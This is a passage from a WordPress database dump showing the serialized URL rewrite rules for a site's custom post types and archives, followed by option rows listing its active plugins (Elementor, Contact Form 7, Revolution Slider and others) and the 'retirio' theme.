\"type/([^/]+)/?$\";s:33:\"index.php?post_format=$matches[1]\";s:42:\"e-landing-page/[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:52:\"e-landing-page/[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:72:\"e-landing-page/[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:67:\"e-landing-page/[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:67:\"e-landing-page/[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:48:\"e-landing-page/[^/]+/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:31:\"e-landing-page/([^/]+)/embed/?$\";s:47:\"index.php?e-landing-page=$matches[1]&embed=true\";s:35:\"e-landing-page/([^/]+)/trackback/?$\";s:41:\"index.php?e-landing-page=$matches[1]&tb=1\";s:43:\"e-landing-page/([^/]+)/page/?([0-9]{1,})/?$\";s:54:\"index.php?e-landing-page=$matches[1]&paged=$matches[2]\";s:50:\"e-landing-page/([^/]+)/comment-page-([0-9]{1,})/?$\";s:54:\"index.php?e-landing-page=$matches[1]&cpage=$matches[2]\";s:39:\"e-landing-page/([^/]+)(?:/([0-9]+))?/?$\";s:53:\"index.php?e-landing-page=$matches[1]&page=$matches[2]\";s:31:\"e-landing-page/[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:41:\"e-landing-page/[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:61:\"e-landing-page/[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:56:\"e-landing-page/[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:56:\"e-landing-page/[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:37:\"e-landing-page/[^/]+/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:47:\"ova_framework_hf_el/[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:57:\"ova_framework_hf_el/[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:77:\"ova_framework_hf_el/[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:72:\"ova_framework_hf_el/[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:72:\"ova_framework_hf_el/[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:53:\"ova_framework_hf_el/[^/]+/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:36:\"ova_framework_hf_el/([^/]+)/embed/?$\";s:52:\"index.php?ova_framework_hf_el=$matches[1]&embed=true\";s:40:\"ova_framework_hf_el/([^/]+)/trackback/?$\";s:46:\"index.php?ova_framework_hf_el=$matches[1]&tb=1\";s:48:\"ova_framework_hf_el/([^/]+)/page/?([0-9]{1,})/?$\";s:59:\"index.php?ova_framework_hf_el=$matches[1]&paged=$matches[2]\";s:55:\"ova_framework_hf_el/([^/]+)/comment-page-([0-9]{1,})/?$\";s:59:\"index.php?ova_framework_hf_el=$matches[1]&cpage=$matches[2]\";s:44:\"ova_framework_hf_el/([^/]+)(?:/([0-9]+))?/?$\";s:58:\"index.php?ova_framework_hf_el=$matches[1]&page=$matches[2]\";s:36:\"ova_framework_hf_el/[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:46:\"ova_framework_hf_el/[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:66:\"ova_framework_hf_el/[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:61:\"ova_framework_hf_el/[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:61:\"ova_framework_hf_el/[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:42:\"ova_framework_hf_el/[^/]+/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:35:\"project/[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:45:\"project/[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:65:\"project/[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:60:\"project/[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:60:\"project/[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:41:\"project/[^/]+/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:24:\"project/([^/]+)/embed/?$\";s:45:\"index.php?ova_projects=$matches[1]&embed=true\";s:28:\"project/([^/]+)/trackback/?$\";s:39:\"index.php?ova_projects=$matches[1]&tb=1\";s:48:\"project/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:51:\"index.php?ova_projects=$matches[1]&feed=$matches[2]\";s:43:\"project/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:51:\"index.php?ova_projects=$matches[1]&feed=$matches[2]\";s:36:\"project/([^/]+)/page/?([0-9]{1,})/?$\";s:52:\"index.php?ova_projects=$matches[1]&paged=$matches[2]\";s:43:\"project/([^/]+)/comment-page-([0-9]{1,})/?$\";s:52:\"index.php?ova_projects=$matches[1]&cpage=$matches[2]\";s:32:\"project/([^/]+)(?:/([0-9]+))?/?$\";s:51:\"index.php?ova_projects=$matches[1]&page=$matches[2]\";s:24:\"project/[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:34:\"project/[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:54:\"project/[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:49:\"project/[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:49:\"project/[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:30:\"project/[^/]+/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:57:\"category_project/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:55:\"index.php?category_project=$matches[1]&feed=$matches[2]\";s:52:\"category_project/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:55:\"index.php?category_project=$matches[1]&feed=$matches[2]\";s:33:\"category_project/([^/]+)/embed/?$\";s:49:\"index.php?category_project=$matches[1]&embed=true\";s:45:\"category_project/([^/]+)/page/?([0-9]{1,})/?$\";s:56:\"index.php?category_project=$matches[1]&paged=$matches[2]\";s:27:\"category_project/([^/]+)/?$\";s:38:\"index.php?category_project=$matches[1]\";s:53:\"year_project/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:51:\"index.php?year_project=$matches[1]&feed=$matches[2]\";s:48:\"year_project/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:51:\"index.php?year_project=$matches[1]&feed=$matches[2]\";s:29:\"year_project/([^/]+)/embed/?$\";s:45:\"index.php?year_project=$matches[1]&embed=true\";s:41:\"year_project/([^/]+)/page/?([0-9]{1,})/?$\";s:52:\"index.php?year_project=$matches[1]&paged=$matches[2]\";s:23:\"year_project/([^/]+)/?$\";s:34:\"index.php?year_project=$matches[1]\";s:35:\"service/[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:45:\"service/[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:65:\"service/[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:60:\"service/[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:60:\"service/[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:41:\"service/[^/]+/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:24:\"service/([^/]+)/embed/?$\";s:40:\"index.php?ova_sev=$matches[1]&embed=true\";s:28:\"service/([^/]+)/trackback/?$\";s:34:\"index.php?ova_sev=$matches[1]&tb=1\";s:48:\"service/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:46:\"index.php?ova_sev=$matches[1]&feed=$matches[2]\";s:43:\"service/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:46:\"index.php?ova_sev=$matches[1]&feed=$matches[2]\";s:36:\"service/([^/]+)/page/?([0-9]{1,})/?$\";s:47:\"index.php?ova_sev=$matches[1]&paged=$matches[2]\";s:43:\"service/([^/]+)/comment-page-([0-9]{1,})/?$\";s:47:\"index.php?ova_sev=$matches[1]&cpage=$matches[2]\";s:32:\"service/([^/]+)(?:/([0-9]+))?/?$\";s:46:\"index.php?ova_sev=$matches[1]&page=$matches[2]\";s:24:\"service/[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:34:\"service/[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:54:\"service/[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:49:\"service/[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:49:\"service/[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:30:\"service/[^/]+/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:48:\"cat_sev/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:46:\"index.php?cat_sev=$matches[1]&feed=$matches[2]\";s:43:\"cat_sev/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:46:\"index.php?cat_sev=$matches[1]&feed=$matches[2]\";s:24:\"cat_sev/([^/]+)/embed/?$\";s:40:\"index.php?cat_sev=$matches[1]&embed=true\";s:36:\"cat_sev/([^/]+)/page/?([0-9]{1,})/?$\";s:47:\"index.php?cat_sev=$matches[1]&paged=$matches[2]\";s:18:\"cat_sev/([^/]+)/?$\";s:29:\"index.php?cat_sev=$matches[1]\";s:32:\"team/[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:42:\"team/[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:62:\"team/[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:57:\"team/[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:57:\"team/[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:38:\"team/[^/]+/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:21:\"team/([^/]+)/embed/?$\";s:37:\"index.php?team=$matches[1]&embed=true\";s:25:\"team/([^/]+)/trackback/?$\";s:31:\"index.php?team=$matches[1]&tb=1\";s:45:\"team/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?team=$matches[1]&feed=$matches[2]\";s:40:\"team/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?team=$matches[1]&feed=$matches[2]\";s:33:\"team/([^/]+)/page/?([0-9]{1,})/?$\";s:44:\"index.php?team=$matches[1]&paged=$matches[2]\";s:40:\"team/([^/]+)/comment-page-([0-9]{1,})/?$\";s:44:\"index.php?team=$matches[1]&cpage=$matches[2]\";s:29:\"team/([^/]+)(?:/([0-9]+))?/?$\";s:43:\"index.php?team=$matches[1]&page=$matches[2]\";s:21:\"team/[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:31:\"team/[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:51:\"team/[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:46:\"team/[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:46:\"team/[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:27:\"team/[^/]+/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:49:\"cat_team/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:47:\"index.php?cat_team=$matches[1]&feed=$matches[2]\";s:44:\"cat_team/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:47:\"index.php?cat_team=$matches[1]&feed=$matches[2]\";s:25:\"cat_team/([^/]+)/embed/?$\";s:41:\"index.php?cat_team=$matches[1]&embed=true\";s:37:\"cat_team/([^/]+)/page/?([0-9]{1,})/?$\";s:48:\"index.php?cat_team=$matches[1]&paged=$matches[2]\";s:19:\"cat_team/([^/]+)/?$\";s:30:\"index.php?cat_team=$matches[1]\";s:38:\"mc4wp-form/[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:48:\"mc4wp-form/[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:68:\"mc4wp-form/[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:63:\"mc4wp-form/[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:63:\"mc4wp-form/[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:44:\"mc4wp-form/[^/]+/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:27:\"mc4wp-form/([^/]+)/embed/?$\";s:43:\"index.php?mc4wp-form=$matches[1]&embed=true\";s:31:\"mc4wp-form/([^/]+)/trackback/?$\";s:37:\"index.php?mc4wp-form=$matches[1]&tb=1\";s:39:\"mc4wp-form/([^/]+)/page/?([0-9]{1,})/?$\";s:50:\"index.php?mc4wp-form=$matches[1]&paged=$matches[2]\";s:46:\"mc4wp-form/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?mc4wp-form=$matches[1]&cpage=$matches[2]\";s:35:\"mc4wp-form/([^/]+)(?:/([0-9]+))?/?$\";s:49:\"index.php?mc4wp-form=$matches[1]&page=$matches[2]\";s:27:\"mc4wp-form/[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:37:\"mc4wp-form/[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:57:\"mc4wp-form/[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\"mc4wp-form/[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\"mc4wp-form/[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:33:\"mc4wp-form/[^/]+/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:12:\"robots\\.txt$\";s:18:\"index.php?robots=1\";s:13:\"favicon\\.ico$\";s:19:\"index.php?favicon=1\";s:48:\".*wp-(atom|rdf|rss|rss2|feed|commentsrss2)\\.php$\";s:18:\"index.php?feed=old\";s:20:\".*wp-app\\.php(/.*)?$\";s:19:\"index.php?error=403\";s:18:\".*wp-register.php$\";s:23:\"index.php?register=true\";s:32:\"feed/(feed|rdf|rss|rss2|atom)/?$\";s:27:\"index.php?&feed=$matches[1]\";s:27:\"(feed|rdf|rss|rss2|atom)/?$\";s:27:\"index.php?&feed=$matches[1]\";s:8:\"embed/?$\";s:21:\"index.php?&embed=true\";s:20:\"page/?([0-9]{1,})/?$\";s:28:\"index.php?&paged=$matches[1]\";s:27:\"comment-page-([0-9]{1,})/?$\";s:39:\"index.php?&page_id=22&cpage=$matches[1]\";s:41:\"comments/feed/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?&feed=$matches[1]&withcomments=1\";s:36:\"comments/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?&feed=$matches[1]&withcomments=1\";s:17:\"comments/embed/?$\";s:21:\"index.php?&embed=true\";s:44:\"search/(.+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:40:\"index.php?s=$matches[1]&feed=$matches[2]\";s:39:\"search/(.+)/(feed|rdf|rss|rss2|atom)/?$\";s:40:\"index.php?s=$matches[1]&feed=$matches[2]\";s:20:\"search/(.+)/embed/?$\";s:34:\"index.php?s=$matches[1]&embed=true\";s:32:\"search/(.+)/page/?([0-9]{1,})/?$\";s:41:\"index.php?s=$matches[1]&paged=$matches[2]\";s:14:\"search/(.+)/?$\";s:23:\"index.php?s=$matches[1]\";s:47:\"author/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?author_name=$matches[1]&feed=$matches[2]\";s:42:\"author/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?author_name=$matches[1]&feed=$matches[2]\";s:23:\"author/([^/]+)/embed/?$\";s:44:\"index.php?author_name=$matches[1]&embed=true\";s:35:\"author/([^/]+)/page/?([0-9]{1,})/?$\";s:51:\"index.php?author_name=$matches[1]&paged=$matches[2]\";s:17:\"author/([^/]+)/?$\";s:33:\"index.php?author_name=$matches[1]\";s:69:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/feed/(feed|rdf|rss|rss2|atom)/?$\";s:80:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&feed=$matches[4]\";s:64:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/(feed|rdf|rss|rss2|atom)/?$\";s:80:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&feed=$matches[4]\";s:45:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/embed/?$\";s:74:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&embed=true\";s:57:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/page/?([0-9]{1,})/?$\";s:81:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&paged=$matches[4]\";s:39:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/?$\";s:63:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]\";s:56:\"([0-9]{4})/([0-9]{1,2})/feed/(feed|rdf|rss|rss2|atom)/?$\";s:64:\"index.php?year=$matches[1]&monthnum=$matches[2]&feed=$matches[3]\";s:51:\"([0-9]{4})/([0-9]{1,2})/(feed|rdf|rss|rss2|atom)/?$\";s:64:\"index.php?year=$matches[1]&monthnum=$matches[2]&feed=$matches[3]\";s:32:\"([0-9]{4})/([0-9]{1,2})/embed/?$\";s:58:\"index.php?year=$matches[1]&monthnum=$matches[2]&embed=true\";s:44:\"([0-9]{4})/([0-9]{1,2})/page/?([0-9]{1,})/?$\";s:65:\"index.php?year=$matches[1]&monthnum=$matches[2]&paged=$matches[3]\";s:26:\"([0-9]{4})/([0-9]{1,2})/?$\";s:47:\"index.php?year=$matches[1]&monthnum=$matches[2]\";s:43:\"([0-9]{4})/feed/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?year=$matches[1]&feed=$matches[2]\";s:38:\"([0-9]{4})/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?year=$matches[1]&feed=$matches[2]\";s:19:\"([0-9]{4})/embed/?$\";s:37:\"index.php?year=$matches[1]&embed=true\";s:31:\"([0-9]{4})/page/?([0-9]{1,})/?$\";s:44:\"index.php?year=$matches[1]&paged=$matches[2]\";s:13:\"([0-9]{4})/?$\";s:26:\"index.php?year=$matches[1]\";s:58:\"[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:68:\"[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:88:\"[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:83:\"[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:83:\"[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:64:\"[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:53:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/([^/]+)/embed/?$\";s:91:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&name=$matches[4]&embed=true\";s:57:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/([^/]+)/trackback/?$\";s:85:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&name=$matches[4]&tb=1\";s:77:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:97:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&name=$matches[4]&feed=$matches[5]\";s:72:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:97:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&name=$matches[4]&feed=$matches[5]\";s:65:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/([^/]+)/page/?([0-9]{1,})/?$\";s:98:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&name=$matches[4]&paged=$matches[5]\";s:72:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/([^/]+)/comment-page-([0-9]{1,})/?$\";s:98:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&name=$matches[4]&cpage=$matches[5]\";s:61:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/([^/]+)(?:/([0-9]+))?/?$\";s:97:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&name=$matches[4]&page=$matches[5]\";s:47:\"[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:57:\"[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:77:\"[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:72:\"[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:72:\"[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:53:\"[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:64:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/comment-page-([0-9]{1,})/?$\";s:81:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&cpage=$matches[4]\";s:51:\"([0-9]{4})/([0-9]{1,2})/comment-page-([0-9]{1,})/?$\";s:65:\"index.php?year=$matches[1]&monthnum=$matches[2]&cpage=$matches[3]\";s:38:\"([0-9]{4})/comment-page-([0-9]{1,})/?$\";s:44:\"index.php?year=$matches[1]&cpage=$matches[2]\";s:27:\".?.+?/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:37:\".?.+?/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:57:\".?.+?/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\".?.+?/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\".?.+?/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:33:\".?.+?/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:16:\"(.?.+?)/embed/?$\";s:41:\"index.php?pagename=$matches[1]&embed=true\";s:20:\"(.?.+?)/trackback/?$\";s:35:\"index.php?pagename=$matches[1]&tb=1\";s:40:\"(.?.+?)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:47:\"index.php?pagename=$matches[1]&feed=$matches[2]\";s:35:\"(.?.+?)/(feed|rdf|rss|rss2|atom)/?$\";s:47:\"index.php?pagename=$matches[1]&feed=$matches[2]\";s:28:\"(.?.+?)/page/?([0-9]{1,})/?$\";s:48:\"index.php?pagename=$matches[1]&paged=$matches[2]\";s:35:\"(.?.+?)/comment-page-([0-9]{1,})/?$\";s:48:\"index.php?pagename=$matches[1]&cpage=$matches[2]\";s:24:\"(.?.+?)(?:/([0-9]+))?/?$\";s:47:\"index.php?pagename=$matches[1]&page=$matches[2]\";}','yes'),(30,'hack_file','0','yes'),(31,'blog_charset','UTF-8','yes'),(32,'moderation_keys','','no'),(33,'active_plugins','a:16:{i:0;s:13:\"cmb2/init.php\";i:1;s:36:\"contact-form-7/wp-contact-form-7.php\";i:2;s:32:\"duplicate-page/duplicatepage.php\";i:3;s:31:\"elementor-pro/elementor-pro.php\";i:4;s:23:\"elementor/elementor.php\";i:5;s:35:\"insert-headers-and-footers/ihaf.php\";i:6;s:37:\"mailchimp-for-wp/mailchimp-for-wp.php\";i:7;s:47:\"one-click-demo-import/one-click-demo-import.php\";i:8;s:31:\"ova-framework/ova-framework.php\";i:9;s:27:\"ova-project/ova-project.php\";i:10;s:19:\"ova-sev/ova-sev.php\";i:11;s:21:\"ova-team/ova-team.php\";i:12;s:75:\"recent-posts-widget-with-thumbnails/recent-posts-widget-with-thumbnails.php\";i:13;s:23:\"revslider/revslider.php\";i:14;s:27:\"updraftplus/updraftplus.php\";i:15;s:53:\"widget-importer-exporter/widget-importer-exporter.php\";}','yes'),(34,'category_base','','yes'),(35,'ping_sites','http://rpc.pingomatic.com/','yes'),(36,'comment_max_links','2','yes'),(37,'gmt_offset','0','yes'),(38,'default_email_category','1','yes'),(39,'recently_edited','','no'),(40,'template','retirio','yes'),(41,'stylesheet','retirio-child','yes'),(42,'comment_registration','0','yes'),(43,'html_type','text/html','yes'),(44,'use_trackback','0','yes'),(45,'default_role','subscriber','yes'),(46,'db_version','57155','yes'),(47,'uploads_use_yearmonth_folders','1','yes'),(48,'upload_path','','yes'),(49,'blog_public','1','yes'),(50,'default_link_category','2','yes'),(51,'show_on_front','page','yes'),(52,'tag_base','','yes'),(53,'show_avatars','1','yes'),(54,'avatar_rating','G','yes'),(55,'upload_url_path','','yes'),(56,'thumbnail_size_w','150','yes'),(57,'thu